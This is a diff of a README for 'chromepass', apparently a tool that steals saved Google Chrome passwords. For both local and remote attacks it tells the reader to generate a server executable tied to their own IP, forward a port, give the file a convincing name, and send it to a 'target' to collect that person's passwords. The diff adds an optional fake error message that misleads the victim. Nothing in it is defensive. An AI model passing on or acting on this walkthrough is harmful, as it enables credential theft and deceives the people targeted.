darkarp/chromepass/README.md

 ## Local Exploitation (If your target is in the same network as you):

+	1. If you want to activate the fake Error message, you should first uncomment line 147 (remove the # character).
+If you don't want a fake message to appear, skip this step.

-	1. Create server by runing the python script "create_server.py".
-	It will then ask you for your ip, you must type your local ip (ex: 192.168.0.1) To find this ip open up CMD and type "ipconfig"
+	2. Create server by runing the python script "create_server.py" It will then ask you for your ip, you must type your local ip (ex: 192.168.0.1) To find this ip open up CMD and type "ipconfig"

-	2. Start the client.exe
+	3. Start the client.exe
 	(I recommend having the client in a directory in "C:\", like "C:\ChromePass\client.exe")

-	3. Send the server.exe to your target
+	4. Send the server.exe to your target
 	(choosing an appropriate name is always important)

-	4. You will obtain a password text file in the same location as the client with all the Google Chrome Passwords.
+	5. You will obtain a password text file in the same location as the client with all the Google Chrome Passwords.

 ## Remote Exploitation (If target is NOT on the same network as you):

+	1. If you want to activate the fake Error message, you should first uncomment line 147 (remove the # character).
+If you don't want a fake message to appear, skip this step.

-	1. Create server by runing the python script "create_server.py".
+	2. Create server by runing the python script "create_server.py".
 	It will then ask you for your ip, you must type your PUBLIC ip (ex: 152.162.93.12).
 	You can obtain your public ip by typing "WhatIsMyIp" on Google.

-	2. Setup Port forwading.
+	3. Setup Port forwading.
 You want to forward the port 80 to your machine (look up how to do that if you don't know)

-	3. Start the client.exe
+	4. Start the client.exe

-	4. Send the server.exe to your target
+	5 Send the server.exe to your target
 	(choosing an appopriate name is always important)

-	5. You will obtain a password text file in the same location as the client with all the Google Chrome Passwords.
+	6. You will obtain a password text file in the same location as the client with all the Google Chrome Passwords.